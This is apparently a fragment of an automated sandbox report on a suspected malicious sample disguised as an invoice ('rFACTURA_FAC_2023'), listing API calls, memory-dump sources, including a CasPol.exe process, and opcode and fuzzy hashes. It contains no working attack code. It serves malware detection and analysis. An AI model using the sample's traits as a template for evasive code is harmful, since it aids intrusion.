                                                                                                  				_t17 = 0;
                                                                                                  				goto L5;
                                                                                                  			}










                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 190613189-0
                                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                  • Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
                                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                  • Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq$Xq$Xq$Xq
                                                                                                  • API String ID: 0-2737156015
                                                                                                  • Opcode ID: 1dbf286e5e0125c50867c560e770a467a75498a76dd7a9063691c89cbd6c02c6
                                                                                                  • Instruction ID: 7855beecf68630a8d3ec41a2d49447d9e421f6f57c9493262e79b75e7fff769b
                                                                                                  • Opcode Fuzzy Hash: 1dbf286e5e0125c50867c560e770a467a75498a76dd7a9063691c89cbd6c02c6
                                                                                                  • Instruction Fuzzy Hash: 4A62BFB5905725ABDB125FB4D0C81CEBBE1AF46F08F2644A9D0C49F569D732920BCBC2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq
                                                                                                  • API String ID: 0-599127549
                                                                                                  • Opcode ID: 7cb745e80075a76251f20395d5ab9a7f7b891e2dbcf028bc3d4365604753a234
                                                                                                  • Instruction ID: 255cc38ed1d3bebff4927b5f6d9ff4e2037c50b08caf2d1e7f792d7d67c54b89
                                                                                                  • Opcode Fuzzy Hash: 7cb745e80075a76251f20395d5ab9a7f7b891e2dbcf028bc3d4365604753a234
                                                                                                  • Instruction Fuzzy Hash: DEF15C78E007189FEB08DFB9C4946AEBBF2BF88700B548569D446EB354DF349846CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fb3cf8962ae542083f2feaaca965bceda9112d4511e9d370057c8175dda31b73
                                                                                                  • Instruction ID: f3c949363b20b331ea9a9c18c1fc07f6743365bde11ec9a7abd9753a04f25243
                                                                                                  • Opcode Fuzzy Hash: fb3cf8962ae542083f2feaaca965bceda9112d4511e9d370057c8175dda31b73
                                                                                                  • Instruction Fuzzy Hash: EB62AE75E11228CFEB64DF69C894BD9BBF2BF89301F1481A9D418A7255DB309E81CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 684e7c4d4633acc40d8c584a1aaf442585ae52870d3f6b780cf6bb23be314d72
                                                                                                  • Instruction ID: 98068777c37775f9f2e87dcf8cc5efa9decde13f7708235d39dad0aa02ecc386
                                                                                                  • Opcode Fuzzy Hash: 684e7c4d4633acc40d8c584a1aaf442585ae52870d3f6b780cf6bb23be314d72
                                                                                                  • Instruction Fuzzy Hash: 7C518575E01608DFDB54CFA9D994A9DBBF2BF89300F248169E815AB364DB30A901CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ph"4
                                                                                                  • API String ID: 0-713816243
                                                                                                  • Opcode ID: a045d4049134df01a9baa6eef50826dbc35d64516ed137c7f93649c8a2cc76a8
                                                                                                  • Instruction ID: ce4f37aebd1abba68fcbc0129e98ffe7d9caccc5187443089e434257a22331a8
                                                                                                  • Opcode Fuzzy Hash: a045d4049134df01a9baa6eef50826dbc35d64516ed137c7f93649c8a2cc76a8
                                                                                                  • Instruction Fuzzy Hash: F621EDB4D0560D8FCB40EFB9C9845EEBBF0FB49200F00456AD805B2210EB305A9ACBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 53215967183ee4adbd910398461d2783925040a0e586f985bdc027bc1e3a8f78
                                                                                                  • Instruction ID: 13269fe9e096b6993d368d09396339fb8715ef456544f2738711a24e2b56e50f
                                                                                                  • Opcode Fuzzy Hash: 53215967183ee4adbd910398461d2783925040a0e586f985bdc027bc1e3a8f78
                                                                                                  • Instruction Fuzzy Hash: DE22E474920219CFDB54DFA4D8A4A9DBBB2FF48301F1085A9D419B7394DB706E92CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 007279056def890cba4829a5073d3ed8c293528f73f031a0b400da821f6bbc8f
                                                                                                  • Instruction ID: c3f96cb2af6e461d4b4515a68cca5074153a844c29385c5d235ac43f179c900a
                                                                                                  • Opcode Fuzzy Hash: 007279056def890cba4829a5073d3ed8c293528f73f031a0b400da821f6bbc8f
                                                                                                  • Instruction Fuzzy Hash: 5912F474920219CFDB54DFA4D8A8A9DBBB2FF48301F1085A9D419B7394DB706E92CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 30b5795c4388cde197068b0fbcbe63fa589ff297f43a560ce8b88cfa5bd0e5ae
                                                                                                  • Instruction ID: 3bfdeefd297da3d79b7f2a6b72824a671a603c3c37c815a313ffd8e9786bcf6c
                                                                                                  • Opcode Fuzzy Hash: 30b5795c4388cde197068b0fbcbe63fa589ff297f43a560ce8b88cfa5bd0e5ae
                                                                                                  • Instruction Fuzzy Hash: 8751BC34520A0A9FC7017F76C6BC13EBFA6FB4F3937846C01A11EA1444DF7504A69BA8
                                                                                                  • Instruction ID: 0ac8988b20cf0c04c7e1906fd67f781c5cf53e26b55f3f1edaf37eeba0444eb0
                                                                                                  • Opcode Fuzzy Hash: 615db80ceb74401ef612fade33a87a9ee9e385059a3228b80d18b8cd50a68f1a
                                                                                                  • Instruction Fuzzy Hash: 4AF0E532D00604CFD710DE79D4686FEFBF1AB89301F809928D016B314CCB306519CA91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a241d9d15ad95b08ae74174e1aec8c8df5931bc1c6b084ecf01016a8da9394cf
                                                                                                  • Instruction ID: ef747e87e66df00e6e80074ba60c3d3428d35f50e26055e84d2f61f58fb38a38
                                                                                                  • Opcode Fuzzy Hash: a241d9d15ad95b08ae74174e1aec8c8df5931bc1c6b084ecf01016a8da9394cf
                                                                                                  • Instruction Fuzzy Hash: 37E0D835C21365AFCB029B709C004DEBF34FF83611B4046A3D42127141F770161EC3A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 795056720cb5594dab41234fa90f72071c711c4a97f009e2aacfd14e9321332c
                                                                                                  • Instruction ID: 9129320229a72d47f8f6f13385007c4948adaf7acc1ce4ca7872dcc9c7093e10
                                                                                                  • Opcode Fuzzy Hash: 795056720cb5594dab41234fa90f72071c711c4a97f009e2aacfd14e9321332c
                                                                                                  • Instruction Fuzzy Hash: 60E06853D08600CFE7008AA194A10B97FF4D993111F4150D7D004F7429D710820A9741
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 85c29e69c6b97f81f9c7f9bfaf029ecd38de56469cac91fdfda3ee25e6706e7f
                                                                                                  • Instruction ID: d5dfc1395a6f103b689831dd74b968675433e34926cc2451f57b0a0bc2e12161
                                                                                                  • Opcode Fuzzy Hash: 85c29e69c6b97f81f9c7f9bfaf029ecd38de56469cac91fdfda3ee25e6706e7f
                                                                                                  • Instruction Fuzzy Hash: 3BE0C23285AA04DAD7514A70A8911E8B7B49B83304F4512A6C418A305A97200959D2D2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 718517d00aaa82d0d89d36a3dccf3ddc20e3d8af9f208f9b75ababc267487fac
                                                                                                  • Instruction ID: d00f66c89435632d15780e5e5811f598f763fc31a68c709826a8ea9cfb7f06c1
                                                                                                  • Opcode Fuzzy Hash: 718517d00aaa82d0d89d36a3dccf3ddc20e3d8af9f208f9b75ababc267487fac
                                                                                                  • Instruction Fuzzy Hash: B3D01235D6022A978B04AAA5DC044EEFB38FE95221B504666D52437140EB70265986E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3fe1a112479e8bee7b69e41464178595e98da2fa15e7e4812d57a7790fe18baf
                                                                                                  • Instruction ID: 7315027111085c9a25b2bff86ddb352a50555893858b632e75ce1858ae6b38a0
                                                                                                  • Opcode Fuzzy Hash: 3fe1a112479e8bee7b69e41464178595e98da2fa15e7e4812d57a7790fe18baf
                                                                                                  • Instruction Fuzzy Hash: DE528E74E01228CFEB64CF65C994BDDBBB2BB89301F1085EAD409A7254DB359E85CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dc7c313b0fd764009e8ed3b31e23209f97fb002d25c95de6798f3d1ff409371f
                                                                                                  • Instruction ID: 3c035fec72d73cd694da32d9fd14bbafb9f6d0bf03eaa3b7fba26d04e9387b3d
                                                                                                  • Opcode Fuzzy Hash: dc7c313b0fd764009e8ed3b31e23209f97fb002d25c95de6798f3d1ff409371f
                                                                                                  • Instruction Fuzzy Hash: 16A18B74A01228CFEB64DF65C894BDABBB2BB49301F5085EAD40DA7360DB719E81CF51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cdb9fe12ed188ed48338fa360bba8d224a83ac3e79bcae3b61a4e9ff46697a1e
                                                                                                  • Instruction ID: 120bea52cd239704ca9e1c50fde2e4f7edbba34ac7f8bdbda3b4ef64841ac021
                                                                                                  • Opcode Fuzzy Hash: cdb9fe12ed188ed48338fa360bba8d224a83ac3e79bcae3b61a4e9ff46697a1e
                                                                                                  • Instruction Fuzzy Hash: 18519E74A11228CFDB64DF25C894B9ABBB2BB4A301F5085E9D40AB7360DB719E81CF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%